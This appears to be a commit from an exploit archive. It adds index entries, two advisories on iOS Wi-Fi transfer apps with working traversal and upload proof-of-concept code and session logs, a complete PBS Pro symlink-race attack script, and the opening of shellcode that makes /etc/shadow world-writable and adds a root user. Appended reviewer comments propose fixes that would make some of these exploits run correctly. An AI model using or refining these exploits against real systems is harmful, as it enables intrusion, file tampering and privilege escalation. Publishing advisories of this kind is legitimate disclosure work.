33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
@ -30860,3 +30860,11 @@ id,file,description,date,author,platform,type,port
34259,platforms/php/webapps/34259.txt,"Bitweaver 2.7 'fImg' Parameter Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34260,platforms/php/webapps/34260.txt,"odCMS 1.07 'archive.php' Cross Site Scripting Vulnerability",2010-07-05,"John Leitch",php,webapps,0
34261,platforms/multiple/dos/34261.txt,"Unreal Engine <= 2.5 'UpdateConnectingMessage()' Remote Stack Buffer Overflow Vulnerability",2010-07-06,"Luigi Auriemma",multiple,dos,0
34262,platforms/linux/shellcode/34262.c,"Shellcode Linux x86 - chmod (777 /etc/passwd & /etc/shadow), Add New Root User (ALI/ALI) & Execute /bin/sh",2014-08-04,"Ali Razmjoo",linux,shellcode,0
34263,platforms/ios/webapps/34263.txt,"Video WiFi Transfer 1.01 - Directory Traversal Vulnerability",2014-08-04,Vulnerability-Lab,ios,webapps,8080
34264,platforms/ios/webapps/34264.txt,"FreeDisk v1.01 iOS - Multiple Vulnerabilities",2014-08-04,Vulnerability-Lab,ios,webapps,8080
34265,platforms/php/webapps/34265.txt,"Exponent CMS 0.97 'slideshow.js.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
34266,platforms/php/webapps/34266.txt,"RunCms 2.1 'check.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
34267,platforms/linux/local/34267.sh,"Altair Engineering PBS Pro 10.x 'pbs_mom' Insecure Temporary File Creation Vulnerability",2010-07-07,"Bartlomiej Balcerek",linux,local,0
34268,platforms/php/webapps/34268.txt,"Worxware DCP-Portal 7.0 Multiple Cross Site Scripting Vulnerabilities",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0
34269,platforms/php/webapps/34269.txt,"Pligg 1.0.4 'install1.php' Cross Site Scripting Vulnerability",2010-07-07,"Andrei Rimsa Alvares",php,webapps,0


platforms/ios/webapps/34263.txt Executable file

@ -0,0 +1,238 @@
Document Title:
===============
Video WiFi Transfer 1.01 - Directory Traversal Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1288
Release Date:
=============
2014-08-02
Vulnerability Laboratory ID (VL-ID):
====================================
1288
Common Vulnerability Scoring System:
====================================
6.7
Product & Service Introduction:
===============================
Using this app, you can download videos to a PC or a smartphone from your iPhone through WiFi. The video downloaded can be played back
on PC and another smart phones as well as Mac and iPhone because the app converts it into a MP4 video. It only takes a few seconds for
the conversion. You would say it is the fastest. Just run the app on the iPhone and open the web browser on your PC or Android. That is
all that you are required to do. It is quite simple. In addition to the web browser, a ftp client application is also supported to
access the videos. Do not pay money for these functions as the app provides all of them without charging.
(Copy of the Homepage: https://itunes.apple.com/de/app/video-wifi-transfer-mp4-conversion/id892132370 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a Directory Traversal vulnerability in the official Bluefinger App Video WiFi Transfer/MP4 Conversion v1.01 iOS mobile application.
Vulnerability Disclosure Timeline:
==================================
2014-08-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
BlueFinger Apps
Product: Video WiFi Transfer/MP4 Conversion - iOS Mobile Web Application 1.01
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A directory traversal web vulnerability has been discovered in the official BlueFinger Apps Video WiFi Transfer v1.01 iOS mobile application.
The vulnerability allows remote attackers to bypass the path restriction of a service to access sensitive app-, web-server or -device information.
The vulnerability is located in the `ftp` (ftp://localhost:8080) service of the wifi `web-server` module. The issue allows an attacker to bypass
the regular `folder/path` validation mechnism to access sensitive app web-server or iOS -device information. The attack vector of the issue is on
the application-side of the service and to perform malicious request the `GET method` is required to use.
After the start of the web-server by usage of the ftp function, the attacker is able to include 5 more path values (../../../../../) to access
unauthorized higher folders outside the mobile application service. In the analysis we saw that the path change of 5 directories is required
to bypass. During the tests we accessed the full app service folder and through the directory traversal to web-server configuration files but
also the parent device directory.
The security risk of the directory traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system)
count of 6.7. Exploitation of the path traversal web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the directory traversal vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] Directory
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Parent Directory (ftp://localhost:8080/)
Note: The structure of the software is the same like in the official BlueFinger Apps `Photo` WiFi Transfer v1.01 iOS mobile application.
The same vulnerability is located in both mobile ios software of the bluefinger apps company.
Proof of Concept (PoC):
=======================
The directory traversal web vulnerability can be exploited by attackers without privileged application user account and user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
Exception:
50 /private/var/mobile/Applications/CFCEEF6E-AA35-42D6-84EC-BFB518F764B1/Documents/video/../../etc/passwd No such file or directory.
Standard Request:
ftp://localhost:8080/../../Documents/
PoC: Links
ftp://localhost:8080/../../../../../../../../../../../../../../../../etc
ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/
ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/
ftp://localhost:8080/../../../../../../../../../../../../../../../../System/
Exploit: PoC (PL)
#!/usr/bin/perl
use LWP::Simple;
print "-------------------------------------------\n";
print "-= Photo WiFi Transfer v1.0.1 - PoC Directory Traversal=-\n";
print "-------------------------------------------\n\n";
print "Target(ftp://localhost:8080/)\> ";
chomp($targ = <STDIN>);
print "Path: (/fn25/)\>";
chomp($path=<STDIN>);
$url = "../../../../../../../../etc/";
$page = get("http://".$targ.$path.$url) || die "[-] Unable to retrieve: $!";
print "[+] Connected to: $page\n";
Exploit: PoC (HTML)
<html>
<head><body><title></title>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../etc>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../usr/>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../Applications/>
<iframe src=ftp://localhost:8080/../../../../../../../../../../../../../../../../System/>
</body></head>
<html>
Exploit: PoC (JS)
<script language=JavaScript>m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%3Ctitle%3E%3C/title%3E%0A%3Ciframe%20src%3Dftp%3A//
localhost%3A8080/../../../../../../../../../../../../../../../../etc%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/
../../../../../../../../../../../../../../../../usr/%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/../../../../../
../../../../../../../../../../../Applications/%3E%0A%3Ciframe%20src%3Dftp%3A//localhost%3A8080/../../../../../../../
../../../../../../../../../System/%3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);</script>
--- PoC Console Logs ---
Applications 14.03.2014 19:06:00
Developer 18.08.2013 06:19:00
Library 20.10.2013 06:32:00
System 17.10.2013 08:08:00
bin 03.07.2014 18:13:00
cores 18.08.2013 05:56:00
Datei:etc 1 KB 20.10.2013 06:32:00
private 05.01.2014 22:18:00
sbin 03.07.2014 18:13:00
Datei:tmp 1 KB 20.10.2013 06:32:00
usr 20.10.2013 06:23:00
Datei:var 1 KB 20.10.2013 06:32:00
300: ftp://localhost:8080/../../../../../../../../
200: filename content-length last-modified file-type
201: "Applications" 0 Sun%2C%2014%20Mar%202014%2019%3A06%3A00 DIRECTORY
201: "Developer" 0 Sun%2C%2018%20Aug%202013%2006%3A19%3A00 DIRECTORY
201: "Library" 0 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 DIRECTORY
201: "System" 0 Sun%2C%2017%20Oct%202013%2008%3A08%3A00 DIRECTORY
201: "bin" 0 Sun%2C%2003%20Jul%202014%2018%3A13%3A00 DIRECTORY
201: "cores" 0 Sun%2C%2018%20Aug%202013%2005%3A56%3A00 DIRECTORY
201: "etc" 11 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE
201: "private" 0 Sun%2C%2005%20Jan%202014%2022%3A18%3A00 DIRECTORY
201: "sbin" 0 Sun%2C%2003%20Jul%202014%2018%3A13%3A00 DIRECTORY
201: "tmp" 15 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE
201: "usr" 0 Sun%2C%2020%20Oct%202013%2006%3A23%3A00 DIRECTORY
201: "var" 11 Sun%2C%2020%20Oct%202013%2006%3A32%3A00 FILE
Note: The traversal becomes visible after the 5th path/folder request and affects like regular the full app path via web-server. (_eTiGb+6)
The issue is the same vulnerability like in the VL-ID 1286. The producer only changed the software name and converter to ensure that
video can be transfered then pictures.
Solution - Fix & Patch:
=======================
The directory traversal web vulnerability can be patched by a secure filter and restriction mechanism in the GET method request of the directory/path name value module.
Security Risk:
==============
The security risk of the directory traversal web vulnerability in the ftp service of the mobile application is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
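Review bot: The Perl PoC does not match the advisory body: it builds an `http://` URL although the traversal is documented against the `ftp://localhost:8080` listing, its banner reads `Photo WiFi Transfer v1.0.1` (the sibling VL-ID 1286 product), and it hard-codes eight `../` segments where the text says five are needed and the PoC links use sixteen. The script also lacks `use strict; use warnings;`, relies on undeclared globals, and prints the whole response body after `[+] Connected to:`. Suggest adding `use strict; use warnings;` under the shebang, declaring `my $targ`, `my $path`, `my $url` and `my $page`, and requesting `get("ftp://$targ$path$url")` (LWP::Simple handles ftp URLs), or else stating explicitly that the HTTP listener on 8080 is affected too, which the text currently does not claim. It would also help readers to say that "Remote" here appears to mean an attacker on the same Wi-Fi network while the app is running, since the product description only exposes the service over WiFi.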

296
platforms/ios/webapps/34264.txt Executable file

@ -0,0 +1,296 @@
Document Title:
===============
FreeDisk v1.01 iOS - Multiple Web Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1287
Release Date:
=============
2014-08-01
Vulnerability Laboratory ID (VL-ID):
====================================
1287
Common Vulnerability Scoring System:
====================================
7.1
Product & Service Introduction:
===============================
Transfer files between your iPhone/iPod/iPad and your computers without iTunes! Just start FreeDisk, and your iDevice is automatically
turned into a wifi hard drive. You can then connect your iDevice to your computers, and use it as a regular hard drive, and easily
transfer files. No need for third part software, or iTunes, to finally exchange files between your iDevices and your computers!
FreeDisk can also turn your iDevice into an internet server to share your files with other smartphones (iOS, Android, Windows...) !
Last but not least, all your data are protected and can only be read when the app is running.
(Copy of the Homepage: https://itunes.apple.com/us/app/free-disk-turn-your-iphone/id896356251 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research team discovered multiple vulnerabilities in the official FreeDisk v1.01 iOS mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2014-08-01: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Sebastien BUET
Product: FreeDisk - iOS Mobile Web Application 1.01
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1
A local file include web vulnerability has been discovered in the official FreeDisk v1.01 iOS mobile web-application.
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload` module. Remote attackers are able to inject own files with
malicious `filename` values in the `uploadfile` POST method request to compromise the mobile web-application. The local file/path
include execution occcurs in the index `file list` context next to the vulnerable `filename` item value. The attacker is able to
inject the local malicious file request by usage of the available `wifi interface` upload form.
Remote attackers are also able to exploit the filename validation issue in combination with persistent injected script codes to execute
different local malicious attacks requests. The attack vector is on the application-side of the wifi service and the request method to
inject is POST.
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count
of 6.8. Exploitation of the local file include web vulnerability requires no privileged web-application user account or user interaction.
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] FreeDisk v1.01
Vulnerable Module(s):
[+] upload
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] FreeDisk App Index File Dir Listing (http://localhost:8080/)
1.2
An arbitrary file upload web vulnerability has been discovered in the official FreeDisk v1.01 iOS mobile web-application.
The arbitrary file upload issue allows remote attackers to upload files with multiple extensions to bypass the web-server or system validation.
The vulnerability is located in the `upload` module. Remote attackers are able to upload a php or js web-shells by renaming the file with
multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following name and extension
`image.jpg.gif.js.php.jpg`. After the upload the attacker needs to open the file in the web application. He deletes the .jpg & . gif file
extension and can access the application file with elevated access rights.
The security risk of the arbitrary file upload web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.4.
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privilege application user account with password.
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
Request Method(s):
[+] [POST]
Vulnerable Service(s):
[+] FreeDisk v1.01
Vulnerable Module(s):
[+] upload
Vulnerable Parameter(s):
[+] filename (multiple extensions)
Affected Module(s):
[+] FreeDisk App Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The local file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: LFI > FreeDisk App Index File Dir Listing (http://localhost:8080/)
/8Oe/3rG8NqF1H9y6jCDRQWTNfOe9OJxmRjy9Ns+DSZRbq5em95UgEIQSBQABd19VWa9ks3W+JruupQrKsaRonTpwgEAjQ6K/hznXLOHz8w7wp5p7spDJNu9IpG6BCz
KOachYJtTbCcRz8fj+BQIDs47ui9n7d5x4yMm5F0zSNNWvWYNs2W558TaWY7MOaawW+xiaVIlKpCgFUinIqr7weiUSwbRu/319ci1JEZDAMAyFEjixHo1GlZtvvvkn
NJ7Jtkf2ShBiuqVcF3VBdTkN1ORViHhViHt4rELFYjKNHjyKEIBgMylQqKTTnlRar+RImEAgoEZDm9XoJh9NnIt9Z386y1W2Mjl9Uhe+exfsmYPmlCS5MfsrHl6a5e
KWH8opyvCJdB0ePHiUejxMKhRTAbMcOV3X05q4Zd0ecTr+0IOi6zoMb23hqIA7TI2oN7iTO0+fxqgmvsmY+DdVp52UN9vT0IIQgFAplFHIxVnq1s3GhyAihqW2cNauWs741kCO/k4kxLlxJy2B1qYpAJBKhp6cHv9+PaZr4/f6rPvgpvZbWohBMdXUVlmUBsGVTq1rKujvk5UtN
1prpWrMsi3A4rOrANM0Z6+B6HoamYrGYUrNkMsnY2Bhbt24F4NUDb/DakTCepSG+f/uNrL2lBSEEsViM3t5eTNNUAvKFHb0VCxOPjxMILGLVqlUM2zZvHjnB5o23q
XV/OBzGMIycCe3LPNUtCBONRlVUXJt9OI4j04e5/n+UufzPh5Rt24yMjKiNig0bNmBZFrFYbNYJ7asEkgFjWacRQpvTOvgiQRSM7JCvN8D1BPlS7H8DAE2nLCe/T
ZDiAAAAAElFTkSuQmCC"></a></td></tr><tr>
<td word-wrap="break-all" align="center">
<a href="<./[LOCAL FILE INCLUDE VULNERABILITY!].png"><./[LOCAL FILE INCLUDE VULNERABILITY!].png"></a></td></tr></table></td><td >
<table width="192 px" border="0" align="center"><tr><td align="center" height="133"><a href="IMG_0650.JPG">
<img src="data:image/png;
--- PoC Session Logs [POST] (LFI) ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[352481] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------17662256993564
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8080/./[LOCAL FILE INCLUDE VULNERABILITY!] Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[317203] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[317203]
Date[Do., 31 Juli 2014 13:38:34 GMT]
1.2
The arbitrary file upload web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: AFU > FreeDisk App Index File Dir Listing (http://localhost:8080/)
/8Oe/3rG8NqF1H9y6jCDRQWTNfOe9OJxmRjy9Ns+DSZRbq5em95UgEIQSBQABd19VWa9ks3W+JruupQrKsaRonTpwgEAjQ6K/hznXLOHz8w7wp5p7spDJNu9IpG6BCz
KOachYJtTbCcRz8fj+BQIDs47ui9n7d5x4yMm5F0zSNNWvWYNs2W558TaWY7MOaawW+xiaVIlKpCgFUinIqr7weiUSwbRu/319ci1JEZDAMAyFEjixHo1GlZtvvvkn
NJ7Jtkf2ShBiuqVcF3VBdTkN1ORViHhViHt4rELFYjKNHjyKEIBgMylQqKTTnlRar+RImEAgoEZDm9XoJh9NnIt9Z386y1W2Mjl9Uhe+exfsmYPmlCS5MfsrHl6a5e
KWH8opyvCJdB0ePHiUejxMKhRTAbMcOV3X05q4Zd0ecTr+0IOi6zoMb23hqIA7TI2oN7iTO0+fxqgmvsmY+DdVp52UN9vT0IIQgFAplFHIxVnq1s3GhyAihqW2cNau
Ws741kCO/k4kxLlxJy2B1qYpAJBKhp6cHv9+PaZr4/f6rPvgpvZbWohBMdXUVlmUBsGVTq1rKujvk5UtN
1prpWrMsi3A4rOrANM0Z6+B6HoamYrGYUrNkMsnY2Bhbt24F4NUDb/DakTCepSG+f/uNrL2lBSEEsViM3t5eTNNUAvKFHb0VCxOPjxMILGLVqlUM2zZvHjnB5o23q
XV/OBzGMIycCe3LPNUtCBONRlVUXJt9OI4j04e5/n+UufzPh5Rt24yMjKiNig0bNmBZFrFYbNYJ7asEkgFjWacRQpvTOvgiQRSM7JCvN8D1BPlS7H8DAE2nLCe/T
ZDiAAAAAElFTkSuQmCC"></a></td></tr><tr><td word-wrap="break-all" align="center">
<a href="<./webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"><webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"></a></td></tr></table></td><td >
<table width="192 px" border="0" align="center"><tr><td align="center" height="133"><a href="IMG_0650.JPG">
<img src="data:image/png;
PoC: http://localhost:8080/webshell.png.jpg.html.js.jpg.png
--- PoC Session Logs [POST] (AFU) ---
Status: 200[OK]
POST http://localhost:8080/ Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[359908] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
POST-Daten:
POST_DATA[-----------------------------3032116335563
Content-Disposition: form-data; name="file"; filename="webshell.png.jpg.html.js.jpg.png[ARBITRARY FILE UPLOAD VULNERABILITY!]"
Content-Type: image/png
Status: 200[OK]
GET http://localhost:8080/webshell.png.jpg.html.js.jpg.png Load Flags[LOAD_DOCUMENT_URI ] Gr??e des Inhalts[317203] Mime Type[application/x-unknown-content-type]
Request Header:
Host[localhost:8080]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0]
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost:8080/]
Connection[keep-alive]
Response Header:
Accept-Ranges[bytes]
Content-Length[317203]
Date[Do., 31 Juli 2014 13:45:00 GMT]
Solution - Fix & Patch:
=======================
1.1
The file inlcude vulnerability can be patched by a secure parse and encode of the filename value in the upload file POST method request.
1.2
The arbitrary file upload issue can be fixed by a secure restriction and filter procedure in the filename type validation mechanism.
Restrict the input and check for extentions to prevent arbitrary file upload with further exploitation.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value is estimated as high.
1.2
The security risk of the arbitrary file upload web vulnerability in the file submit function is estimated as high.
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either
expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers
are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even
if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation
of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break
any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: dev.vulnerability-db.com - forum.vulnerability-db.com - magazine.vulnerability-db.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
--
VULNERABILITY LABORATORY RESEARCH TEAM
DOMAIN: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
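Review bot: The finding labelled "local file include" in 1.1 is, on the evidence of the session logs, a stored HTML/script injection through the upload `filename`: the listing excerpt renders the raw name inside `<a href="...">` (the leading `<` already breaks the markup), and the follow-up GET for `./[LOCAL FILE INCLUDE VULNERABILITY!]` returns the 317203-byte upload itself, not any local file, so no server-side inclusion is demonstrated. The same applies to 1.2: `webshell.png.jpg.html.js.jpg.png` is served back as `application/x-unknown-content-type` with the identical length and nothing shows the embedded iOS server interpreting it, so "web-shell" and "elevated access rights" are not supported by the logs; what is shown is that an attacker on the same WLAN can store arbitrary content and, if the server ever serves it as HTML, gain same-origin script execution. The CVSS figures also disagree (7.1 in the header, 6.8 and 7.4 in the body) and both PoC sections say "local attackers" while the technique is "Remote". Suggest retitling 1.1 as `Persistent filename injection (stored XSS / HTML injection) in the file listing` and qualifying 1.2 as unrestricted upload of arbitrary content rather than code execution.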

55
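--- a/platforms/linux/local/34267.sh
+++ b/platforms/linux/local/34267.sh
@@ -0,0 +1,55 @@
+source: http://www.securityfocus.com/bid/41449/info
+Altair Engineering PBS Pro creates temporary files in an insecure manner.
+An attacker with local access could potentially exploit this issue to perform symbolic-link attacks, overwriting arbitrary files in the context of the affected application.
+Successfully mounting a symlink attack may allow the attacker to delete or corrupt sensitive files, which may result in a denial of service. Other attacks may also be possible.
+Versions prior to PBS Pro 10.4 are vulnerable.
+#!/bin/bash
+#set -x
+# PBS Pro < 10.4 o+w race condition vulnerability Proof Of Concept by Bartlomiej Balcerek - bartol@pwr.wroc.pl
+# Must be run on submitting host and will create /tmp/pbs_test_by_bartol file on exec host as a next job owner UID
+echo Compiling racer...
+cat << EOF | gcc -x c -o racer.x -
+//repeatedly tries to create arbitrary choosen link
+#include <unistd.h>
+int main(int argc, char* argv[])
+{
+if (argc < 3) {printf("%s","Need 2 arguments!");exit(1);}
+while (1) symlink(argv[1],argv[2]);
+};
+EOF
+if [ ! -x racer.x ]; then echo "Cannot compile C code, do you have gcc installed ?" ;exit 1; fi
+echo Submitting job...
+jobname=`echo hostname | qsub -j oe -o out.txt`
+sleep 2
+host=`cat out.txt`
+if [ -z $host ]; then echo "Cannot determine next execution host, is quere working ?"; exit 1;fi
+rm out.txt
+echo Next job will be run on $host
+echo Copying racer to $host...
+scp ./racer.x $host:/tmp
+echo Calculating job id...
+jobid=`echo $jobname | cut -d . -f 1`
+jobid=$(($jobid+1))
+if [ ! $jobid -ge 0 ]; then echo "Cannot determine next job ID!";exit 1;fi
+echo Next job ID will be $jobid
+hostname=`echo $jobname | cut -d . -f 2`
+echo Running racer...submit job as different user, than push Ctrl+C after while.
+ssh $host -- \(/tmp/racer.x /tmp/pbs_test_by_bartol /var/spool/pbs/spool/${jobid}.${hostname}.OU \)
+ssh $host -- killall racer.x
+echo /var/spool/pbs/spool on $host content:
+ssh $host -- ls -latr /var/spool/pbs/spool
+echo Cleaning up...
+ssh $host -- unlink /var/spool/pbs/spool/${jobid}.${hostname}.OU
+ssh $host -- ls -latr /var/spool/pbs/spool
+ssh $host -- rm -v /tmp/racer.x
+rm -v racer.x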
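Review bot: The racer compiled from the heredoc calls `printf` and `exit` with only `<unistd.h>` included, so it depends on implicit function declarations that current gcc releases reject as errors, and the `};` after main's closing brace is a stray file-scope semicolon; add `#include <stdio.h>` and `#include <stdlib.h>` beside the existing include. In the driver, `if [ -z $host ]` should be `if [ -z "$host" ]` so an empty or multi-word result still evaluates correctly, and the next-job guess `jobid=$(($jobid+1))` silently assumes no other submission lands in between, so a mis-predicted id makes the racer target a spool file name that is never created. Since the script is destructive on a shared cluster (it leaves `/tmp/pbs_test_by_bartol` owned by another user's UID and races the live `/var/spool/pbs/spool` directory, which must be world-writable for the symlink to be placed), a comment stating those preconditions and the clean-up it performs would help anyone reproducing it.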

144
platforms/linux/shellcode/34262.c Executable file

@ -0,0 +1,144 @@
/*# Exploit Title: Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Execute /bin/sh
# Date: 4/8/2014
# Exploit Author: Ali Razmjoo
# Tested on: kali-linux-1.0.4-i386 [3.7-trunk-686-pae #1 SMP Debian 3.7.2-0+kali8 i686 GNU/Linux ]
*/
/*
Ali Razmjoo , Ali.Razmjoo1994@Gmail.Com
Shellcode Linux x86 chmod(777 /etc/passwd and /etc/shadow) && (Add new root user [ALI] with password [ALI] for ssh) && Setreuid() , Execute /bin/sh
length: 378 bytes
chmod('/etc/passwd',777)
chmod('/etc/shadow',777)
open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , close passwd
setreuid() , execve('/bin/sh')
00000000 <_start>:
0: 31 c0 xor %eax,%eax
2: 31 db xor %ebx,%ebx
4: 6a 0f push $0xf
6: 58 pop %eax
7: 68 6a 73 77 64 push $0x6477736a
c: 5b pop %ebx
d: c1 eb 08 shr $0x8,%ebx
